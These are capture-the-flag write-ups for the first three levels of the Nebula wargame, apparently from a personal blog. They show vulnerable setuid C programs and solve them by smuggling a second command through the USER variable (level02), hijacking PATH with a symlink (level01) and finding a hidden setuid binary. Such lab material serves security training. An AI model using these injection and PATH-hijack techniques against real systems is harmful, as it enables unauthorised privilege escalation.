Exploit Exercises Nebula — level02

Source code for this level looks like this:

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>

int main(int argc, char **argv, char **envp)
{
char *buffer;

gid_t gid;
uid_t uid;

gid = getegid();
uid = geteuid();

setresgid(gid, gid, gid);
setresuid(uid, uid, uid);

buffer = NULL;

asprintf(&buffer, "/bin/echo %s is cool", getenv("USER"));
printf("about to call system(\"%s\")\n", buffer);

system(buffer);
}

I’ll admit it that I spent on this *way* too much time because I was focused on different approach (which, by the way, doesn’t work). This is even easier than the previous one.

You immediately see that part of the command that will be executed is provided by the user via $USER environment variable. Alas programmer doesn’t make any checks so we can provide string like this "&& /bin/getflag" which after concatenation will look like this "/bin/echo && /bin/getflag is cool".

$ export USER="&& /bin/getflag"

Now you only need to execute /home/flag02/flag02. kthxbai.

Exploit Exercises Nebula — level01

Our job is to find vulnerability in below application:

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>

int main(int argc, char **argv, char **envp)
{
gid_t gid;
uid_t uid;
gid = getegid();
uid = geteuid();

setresgid(gid, gid, gid);
setresuid(uid, uid, uid);

system("/usr/bin/env echo and now what?");
}

You can spot right away that something is wrong with command supplied to the system(). Programmer uses env hence echo relies on $PATH (man env and this). We can abuse that because command line uses $PATH as a reference to real binaries (e.g. when you type ls you really executing /bin/ls which is referenced by $PATH).

First we need to create symbolic link named echo pointing to /bin/getflag:

$ ln -s /bin/getflag ~/echo

Then we need to export new $PATH that points to our home directory:

$ export PATH=/home/level01

After this we can successfully launch /home/flag01/flag01.

Exploit Exercises Nebula — level00

First things first even if they are trivial.

This level requires you to find a Set User ID program that will run as the “flag00” account. You could also find this by carefully looking in top level directories in / for suspicious looking directories.

Alternatively, look at the find man page.

To access this level, log in as level00 with the password of level00.

So after login I’ve typed first command that popped to my mind and that was:

$ find / |grep flag00

At the bottom of the output you can spot weird looking path /bin/.../flag00 which after execute grants you green light to execute /bin/getflag.